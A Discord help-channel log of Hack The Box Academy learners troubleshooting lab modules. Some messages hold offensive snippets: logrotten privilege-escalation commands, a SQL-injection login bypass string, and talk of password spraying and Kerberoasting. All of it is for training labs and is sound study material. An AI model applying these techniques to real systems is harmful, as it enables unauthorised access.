
novel lynx
dim wolf
#

just need a sanity check on Advanced XSS and CSRF Exploitation - Misc CSRF Exploitation exercise. after logging in, am i supposed to be redirected to /login.php?

cloud urchin
#

can you see where you're supposed to be redirected in the response?

dim wolf
#

it's supposed to be /profile.php, but i get 302 redirect to /login.php

#

login, server-side redirect to /admin.php -> /admin.php client-side redirect to /profile.php -> /profile.php server-side redirect to /login.php

cloud urchin
#

i don't think i get that when i log in

fathom pendant
#

wow...the uh... Misc section of Linux Privesc really is that simple huh... not much to it...

dim wolf
#

the exercise might be borked then

fathom pendant
#

just uh

#

do thing

#

:/

cloud urchin
#

that wouldn't stop completing the exercise

#

i just completed the exercise without issue

#

i never got redirected to login.php after logging in, but it doesn't matter for this anyway

coral trout
#

Please I need a guide I'm just a beginner coming into the cyber security space with no pior tech knowledge

compact patrolBOT
covert nest
#

Im looking for someone who has done the module web attacks specifically the advanced file disclosure, i am stuck with the the files not showing up just a blank page any assistance would be amazing

dim wolf
rustic sage
#

hey guys

#

I need some help

dim wolf
#

i cleared my cookies and i was able to access the page

cloud urchin
#

maybe i misunderstood what you were asking

rustic sage
dim wolf
#

it's all good, got the flag in the end

rustic sage
#

?? Please someone?

#

Damn, no-one wants to help?

dim wolf
rustic sage
#

Okay

#

Sorry

rustic sage
#

I figured it out. It was quite intriguing to say the least. Had to create a bar chart with the horizontal axis being @timestamp and chaning the interval to @timestamps per day and then finding the most timestamps per day. I found it on 2023-03-05.

dim wolf
#

you don't need to do anything involved to solve it

quasi wave
#

Hi I'm having trouble with meterpreter section of Using the Metasploit Framework module. When I try scanning with nmap within metasploit it says database not connected. I looked to see if postgresql is installed and got this:

┌─[us-academy-4]─[10.10.15.140]─[htb-ac-605555@htb-xrvkqlfhf6]─[~]
└──╼ [★]$ sudo service postgresql status
○ postgresql.service - PostgreSQL RDBMS
     Loaded: loaded (/lib/systemd/system/postgresql.service; disabled; preset: >
     Active: inactive (dead)```
Should I just use regular Nmap? What do you propose? How should I move forward?
rustic sage
#

Sorry, I was going on a limb because I was trying to figure it out, so I typed it really fast. I actually copy and pasted the question from the actual module.

#

And you have to create a bar chart to solve it

dim wolf
#

you don't have to create anything to solve it

rustic sage
#

Well I had to find the date :/

dim wolf
#

the date is very easy to find, you just have to understand what the question is asking

#

i'd show you, but HTB thinks i'm a bot right now so i can't actually look at the question

rustic sage
#

Oh

#

@quasi wave Did you start POSTGRE?

quasi wave
#
┌─[us-academy-4]─[10.10.15.140]─[htb-ac-605555@htb-xrvkqlfhf6]─[~]
└──╼ [★]$ sudo service start postgresql
start: unrecognized service
rustic sage
#

Try systemctl

quasi wave
#

ok

rustic sage
#

$ sudo systemctl start postgresql

#

And then after

quasi wave
#

it worked thanks

rustic sage
#

$ sudo systemctl enable postgresql

quasi wave
#

ok great will do that too

rustic sage
#

And then check the status!

quasi wave
#

ya its active

#

I did thanks

rustic sage
#

Okay good!

#

No problem.

quasi wave
#

it still says database not connected

rustic sage
#

Hm

quasi wave
#

hold on let me try doing it within metasploit console

rustic sage
#

Do you have pgAdmin4?

#

Do

#

sudo -i -u postgres

#

And then psql

#

Then /conninfo

quasi wave
#

ok

rustic sage
#

And then do /l

quasi wave
#

ok

rustic sage
#

After you do the sudo command, type psql in your console to get the sql terminal

dim wolf
#

Security Monitoring & SIEM Fundamentals - SIEM Visualization Example 4: Users Added or Removed From a Local Group (Within a Specific Timeframe)

Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Extend the visualization we created or the "User added or removed from a local group" visualization, if it is available, and enter the common date on which all returned events took place as your answer. Answer format: 20XX-0X-0X

this question is deceptively easy, you just have to read it carefully. i've bolded the keyword that you need to note. the notes i have on this question are just one sentence and a screenshot

quasi wave
#

I did

#

I'm in sql terminal

rustic sage
#

@dim wolf thanks

#

/conninfo

quasi wave
#

I did that too

rustic sage
#

What comes up?

quasi wave
#

nothing comes up and after /l nothing comes up either

rustic sage
#

Weird

quasi wave
#

kind of weird tbh ya maybe should just use nmap?

#

for first part and see if I run into issues

rustic sage
#

Yeah

quasi wave
#

ok I'm logged into meterpreter so I got by just fine so far

#

I completed the section on my own otherwise and got all the flags

#

super sweet how well this is going

rustic sage
#

Okay that’s good

#

!!!!

quasi wave
#

I think the remaining 4 sections of this module are just notetaking sections and text content and then I get to move onto password attacks

#

which will be great

#

anyway I think this section went by quickly like in one or two weeks

#

which is fabulous

#

I'm certainly getting better at working through the HTB Academy material

rustic sage
#

Thats great!

pseudo kiln
#

How long does this typically take ? logrotten

||./logrotten -p ./payload /home/htb-student/backups/access.log Waiting for rotating /home/htb-student/backups/access.log...||

cloud urchin
#

it's like instant

pseudo kiln
#

it seems I needed to simulate a log write with ||echo test >> /home/htb-student/backups/access.log;./logrotten -p ./payload /home/htb-student/backups/access.log||, otherwise it was not working, I guess that's where the race condition aspect comes from, but the module does a very poor job at explaining how this exploit works....

cloud urchin
#

its a very finnicky exploit and you have to be fast

pseudo kiln
#

yeah for some reason I could not get it to set the SUID bit, only getting a reverse shell and setting the SUID quickly from there

fading bough
#

,

rustic sage
#

E

cloud urchin
#

you should delete the pic

cloud urchin
#

i believe it's because the cred dump includes the ntlm hash of the different identities allowed by the delegation

wise atlas
#

Hello guys am just starting with my academy lessons I need help with this question. Which shell is specified for the htb-student user?

cloud urchin
#

sorry what? is that in a module or something?

sinful narwhal
#

please help me on last 2 Q. : Password Attacks | Pass the Ticket (PtT) from Linux
I'm in "root@linux01:/#" but still getting failed

woven vessel
heady hazel
#

hi all, apparently I'm stuck a first Skills Assessment first question DACL ATTACKS I: "What's the username of the account that Carlos can perform a targeted Kerberoasting attack against?"

I used sharphound to collect data and ingest into Bloodhound, set carlos as "owned" a then used "List all kerberoastable accounts".

Actually I got 3 users, and I am able to get hashes for all of them, but none is the correct answer. Any suggestion? thank you!

dim wolf
potent dust
#

I have a question regarding oscp

The price for 3 months access is 1649$ does that mean I should do the exam right after the end of my course access? Or I can do it later on?

dim wolf
#

read and follow #welcome to ask in a more appropriate channel

median gale
#

Any idea why tihs isnt runnning? I think the command is correct should be running...

wise atlas
#

The module name is Linux fundamentals

misty current
#

You can DM me

median gale
cedar zinc
#

Acadamy - module - web Fuzzing - Virtual Host and Subdomain Fuzzing - Question - Using GoBuster against the target system to fuzz for vhosts using the common.txt wordlist, which vhost starts with the prefix "web-"? Respond with the full vhost, eg web-123.inlanefreight.htb - The command to run is - gobuster vhost -u http://inlanefreight.htb:81 -w /usr/share/SecLists/Discovery/Web-Content/common.txt --append-domain - But there is no VHOST starting with "-web" ?? any other method to find it ? or is my command wrong ? Plz help

forest gust
cedar zinc
limpid hemlock
#

Anyone knw what header on title page say when opening aquatonr html page ?

acoustic owl
acoustic owl
forest gust
#

@acoustic owl Hi can you help plz

acoustic owl
forest gust
zealous rune
#

Hi, i am currently working on the Attacking AD module section Password spraying from linux

#

I am workin on the end of section question "Find the user account starting with the letter "s" that has the password Welcome1. Submit the username as your answer. "

#

I enumerated users using an anonymous ldap bind. Filtered list of found users for those beghinning with s. Then used crackmapexec to attempt to login with Welcome1 as a password for the saved user list. I used the UserPrincipalName as a pose to the SAMAccountname as the username

acoustic owl
zealous rune
#

Thus far haven't been able to locate the user which has Welcome1 password

#

I feel like the user enumeration should be fine as it's via an ldap anon bind on the DC itself so i should have "all" the users to try

#

perhaps sam account name and local login to the DC

#

any hints welcome

dim wolf
#

i'd use kerbrute rather than cme/nxe for password spraying

wicked apex
#

have anyone installed bloodhound in pwnbox before sucessfully?
did you used the one given or installed via pipx install bloodhound
or pipx install bloodhound.py ?

zealous rune
#

ok i can try with kerbrute, but in this case i don't expect the results to be different.... however for reasons of stealth kerbrute is prob. a better option right?

forest gust
zealous rune
#

goddamit

#

i got a hit with kerbrute

#

i don't fully understand why

dim wolf
#

i believe it's faster since it uses Kerberos to authenticate rather than authenticating to SMB and having to query the DC

zealous rune
#

yes faster for sure

zealous rune
#

but i don't understand why i got kerbrute report success and crackmapexec not report hit

forest gust
dim wolf
#

could be a number of reasons

zealous rune
#

hmmm

acoustic owl
zealous rune
#

maybe with crackmapexec i am trying to login to smb

dim wolf
#

you could be doing local auth instead of kerberos auth

#

not really sure

zealous rune
#

i'm using smb to login.... not using local-auth

median gale
#

in password attacks password mutation do you realy have to wait for this long? (21h)?

cedar zinc
zealous rune
#

Interesting

#

using samaccountname with crackmapexec and smb protocol works

#

using kerbrute UserPrincipalname works

acoustic owl
next bronze
cedar zinc
#

Cause I tried the inlanefreight.htb... didn't work ?

#

This domain was mentioned in the examples

acoustic owl
cedar zinc
#

Thanks

lunar lily
#

Hi all, I have a question regarding the “Get started” module, “public exploit” section.
The exercise says “Try to identify the services running on the server above, and then try to search to find public exploits to exploit them. Once you do, try to get the content of the '/flag.txt' file.”
How could I know there is indeed a txt file with that specific name at that address? Would that be by using gobuster explained in a previous section?

grand portal
lunar lily
grand portal
#

So don't you know what's on the webpage of that Ip adress when you browse it?

#

You can use searchsploit to find vulnerabilities.

lunar lily
#

Yes, I could find the "wp_simple_backup_file_read" vulnerability and use it. My question is rather how would I know the target filepath "/flag.txt" if Academy had not provided it in the first place? I guess there should be a way to enumarate subdomains or files? (hence my guess of gobuster)

grand portal
#

That filepath is the path where you want your outputs to be.

lunar lily
#

Isn't it the target? had to change it for the /flag.txt in order to complete the exercise

grand portal
lunar lily
grand portal
#

But it sure worked when i assumed so.

#

You may research more about it. You're welcome.

sacred jacinth
lunar lily
sacred jacinth
#

thanks man!

#

I think I can figure out the rest

lunar lily
sacred jacinth
worn matrix
#

Hello everyone,i just want to ask a questio.There is any news about any module that will focus on Cloud PenTesting?or something similar?or will be any module,in the future?thanks

scarlet horizon
#

hello can i share the documentaion i made about the attacking enterprise module on linked in or is it against some rule

ocean night
broken valley
#

Hello, i have just finished my degree in computer science. I have picked cyber security as a field to get my master's degree at. My intention was to get into ethical hacking but i have found myself defending instead of attacking '-'. Could you guys recommend me a road map to get started in White hat hacking? Thank you all in advance and my apologies for my English '-'

compact patrolBOT
ocean night
#

🙂

quaint current
#

Hello,

Module: Footprinting
section: SMTP

Question: Enumerate the SMTP service even further and find the username that exists on the system. Submit it as the answer.

Hint :On systems usernames are often named after the employee's name. We recommend to use the Footprinting-wordlist provided as resource. Remember that some SMTP servers have higher response

I have found the answer using a specific module in metasploit. However, I can't say the same thing using dedicated scripts (smtp-enum-users.pl). Did you have the same exsperience? Is it an issue from me or from the tools?

grand portal
broken valley
grand portal
#

Cpts might be good option for you. I'm doing it.

grand portal
hexed tartan
#

hello i stuck on password attack/Network services last flag smb someone help?

#

already found but nothing is writeble or read

hexed tartan
#

what evilwin?

marsh echo
#

use it for connect to log in with the credentials you found

hexed tartan
marsh echo
#

yes but you have listed the file shares but now you have to connect so remove the --smb option

hexed tartan
midnight tulip
#

~tts_hello_world

acoustic owl
idle sigil
#

Hi, I have just subscribed to the silver annual htb plan and the acknowledgment email sent to me mentioned "Access to the one-to-one lab exercise tutoring through Discord." I would like to know what is it and how can i make use of it?

midnight tulip
#

868599843776512030

midnight tulip
marsh echo
# hexed tartan

ah but in your previous screenshot you used john that's why I'm telling you this from now on if you use the user Cassie use smbclient with user cassie

compact patrolBOT
#

• Gateway Latency: 90ms
• Start time: 2 days ago
• Version: 1.2.8

acoustic owl
hexed tartan
rustic sage
#

I love SOC because people trust you so much more

rustic sage
#

i do pentesting path cause i find it more fun to do practical based stuff

#

atleast u have fun with what u enjoy + money

#

I do both pentesting and defense. I work on the blue team, but being able to do both helps you really understand what’s going on.

median gale
#

Any idea what could help if you keep getting disconnected from rdp sessions ?

safe cairn
median gale
#

Haha mine as well but not with socks

safe cairn
#

Maybe there are some problems

next bronze
#

use TCP for your vpn

safe cairn
#

It seems works, thank you!

median gale
#

..altough it seems like it isnt

next bronze
#

technically it is but you probably won't notice it doing the labs

median gale
#

Lazagne keeps dropping after a couple of secondson target box any ideas what might be the cause ?

digital crown
#

I have problem with linux privilige escalation module
It's about Priviliged groups part
So it's all about lack of unzip tool which i cant download due to lack of rights to do so

#

I know it's a different user but in questions it tells me to use secaudit account

wanton ore
hexed tartan
#

Hello i stuck on password attack/Attacking SAM in the last question dumping LSA can anyone help? i used all password found

marsh echo
shut vapor
marsh echo
quiet trout
#

someone mind helping with a sanity check on the BBH -> SQLi Fundamentals -> SQL Operators Module

https://academy.hackthebox.com/module/33/section/192

The task is a trivial count on a key in a table, but im not understanding how theres a nested table? dont think thats allowed.

+--------------------+
| Database           |
+--------------------+
| employees          |
| information_schema |
| mysql              |
| performance_schema |
| sys                |
+--------------------+
5 rows in set (0.070 sec)

MariaDB [employees]> use employees;
Database changed
MariaDB [employees]> describe employees;
+------------+---------------+------+-----+---------+-------+
| Field      | Type          | Null | Key | Default | Extra |
+------------+---------------+------+-----+---------+-------+
| emp_no     | int(11)       | NO   | PRI | NULL    |       |
| birth_date | date          | NO   |     | NULL    |       |
| first_name | varchar(14)   | NO   |     | NULL    |       |
| last_name  | varchar(16)   | NO   |     | NULL    |       |
| gender     | enum('M','F') | NO   |     | NULL    |       |
| hire_date  | date          | NO   |     | NULL    |       |
+------------+---------------+------+-----+---------+-------+
6 rows in set (0.071 sec)

MariaDB [employees]> ### not seeing titles here...
MariaDB [employees]> describe titles;
+-----------+-------------+------+-----+---------+-------+
| Field     | Type        | Null | Key | Default | Extra |
+-----------+-------------+------+-----+---------+-------+
| emp_no    | int(11)     | NO   | PRI | NULL    |       |
| title     | varchar(50) | NO   | PRI | NULL    |       |
| from_date | date        | NO   | PRI | NULL    |       |
| to_date   | date        | YES  |     | NULL    |       |
+-----------+-------------+------+-----+---------+-------+
4 rows in set (0.070 sec)

MariaDB [employees]> ### titles is a table, inside the employees table???
MariaDB [employees]> 
#

ive been trying a few weird ass commands to try to source the full db location of this "titles" tables but not having much luck this sorta schema stuff is new to me

#
+--------------+------------+
| TABLE_SCHEMA | TABLE_NAME |
+--------------+------------+
| employees    | titles     |
+--------------+------------+
1 row in set (0.070 sec)

MariaDB [employees]> ```

table schema? i thought employees was the table name?
#

oh gosh

quiet trout
#

sorry got lost in the sauce here... i think its a db

#

yep, thx

quiet trout
#

(i think this the part that got me twisted up)

#

unless theres a table named employees in the employee database?

median gale
#

Passwrod attacks, Passwd, Shadow & Opasswd running hashcat on the root hash with the whole rockyou takes estimated 4 hours is there a faster way to achieve this?

acoustic owl
shut vapor
digital crown
quiet trout
#

is there any way to view a htb labs php source contents? im doing a trivial sqli lab but this time around i'd like to see what the php server is doing... ive viewed page source and theres no php but im not terribly well versed in back end development so im not entirely sure where to look, especially as a "user"

dim wolf
#

you'll need the PHP file for that

#

so if you have some superuser privs as the user in the database, you can probably find a way to get it

quiet trout
#

oh you know what its a seriously canonical example (login logic bypass) maybe chatgpt can whip something up in kind

#

like a username: admin' or '1=1 type deal

#

yeah chat gpt got me sorted

steady warren
#

@quiet trout hey can u give me a step by step by course guide for becoming an hacker

quiet trout
wanton ore
quiet trout
#

do you like reading books? books work best.

cloud urchin
#

lol it says CEH is an "advanced certification"

steady warren
#

I wasn't talking about that 😒

cloud urchin
#

it's a good start

steady warren
#

I was asking about the step by step Htb course guide

#

And i prefer Oscp then ceh

cloud urchin
#

the modules are step by step guides themselves

#

they walk you through an overview, how it works, shows you commands you can use, shows you what you should expect for results, then it tests you on that knowledge with a skill assessment

quiet trout
#

yeah man, you're lookin at it

#

and books of course.

steady warren
#

Are the modules in an step by step guide?

cloud urchin
#

the modules themselves are a guide

#

they teach you exactly what to do

steady warren
#

I am not talking about the path

cloud urchin
#

a htb path is just a series of modules

steady warren
#

Should I go for direct modules or choose a path

cloud urchin
#

since you're just starting you should probably start with some of the fundamental modules and then move on to a path like cpts

steady warren
#

That was the confusion I was thinking how should I start

cloud urchin
#

start with the tier 0 modules like getting started

steady warren
#

So modules are in order right

cloud urchin
#

in the path they are

steady warren
#

What if I go every single modules one by one

cloud urchin
#

then you will learn a lot

steady warren
#

@cloud urchin do u work in htb

cloud urchin
#

no

steady warren
#

So did u also took the modules from htb

cloud urchin
#

yes i did

steady warren
#

How long will it take to complete all modules one by one

cloud urchin
#

i didn't complete every single one. i completed all the modules in the cpts path and a few modules that looked interesting to me. took me about 1.5 months putting in 8+ hours a day

#

that grants read permissions to the owner of the file. root can also read it just because they're root.

steady warren
#

What all did u learn from the modules

cloud urchin
#

too much to list here

steady warren
#

Do they teach to hack

#

Or only defend

cloud urchin
#

both

steady warren
#

Can u tell me some of the hacks u learned

cloud urchin
#

here's a pic of my notes, each one of the circles contains a ton of info about a specific topic, if this puts it into perspective for you.

proper jay
#

hi! I have problem to connect to target with VM, linux termial gives me only error [0x00020006]

dim wolf
#

text is unreadable 😭

cloud urchin
#

ya don't need to read it lol

zealous rune
#

holy cow

#

that's some mad notetaking

dim wolf
#

of course not, but it's cool to see all the relations between certain topics/skills

zealous rune
#

what's that done in

cloud urchin
#

obsidian

zealous rune
#

ah

#

i use obsidian too

cloud urchin
#

if you look at the graph view that's what shows up

zealous rune
#

didn't know that was possible

steady warren
#

@cloud urchin r u able to code a malware 😏

cloud urchin
#

not yet

#

HTB doesn't teach that though

#

for that i'd recommend maldevacademy

steady warren
#

So what hack can u do

#

Tell me one hack u can run

cloud urchin
#

network, ad, wireless, etc

earnest shuttle
#

Hello, I have a problem with one of the machines. It asks me about the Redis database and gives me two options. I put the correct one and it gives me an error. I tried to put the one I think is incorrect and it gives me an error. Can you help me too?

steady warren
#

Wireless what wifi Hacking anyone can do that

#

With Linux wifite

cloud urchin
#

nah i like hcxdumptools

steady charm
#

Any advice on what to do if a module target machine refuses to spawn?

cloud urchin
wanton ore
#

btw guys, this a channel for modules, there is another channel for general chat @steady warren @cloud urchin

steady charm
cloud urchin
#

yeah he was asking about the modules but it veered off topic

steady warren
#

It doesn't matter dude @wanton ore

#

Be on your own

cloud urchin
#

he's right

wanton ore
steady warren
#

What do u guys vote for Cyber security or Hacking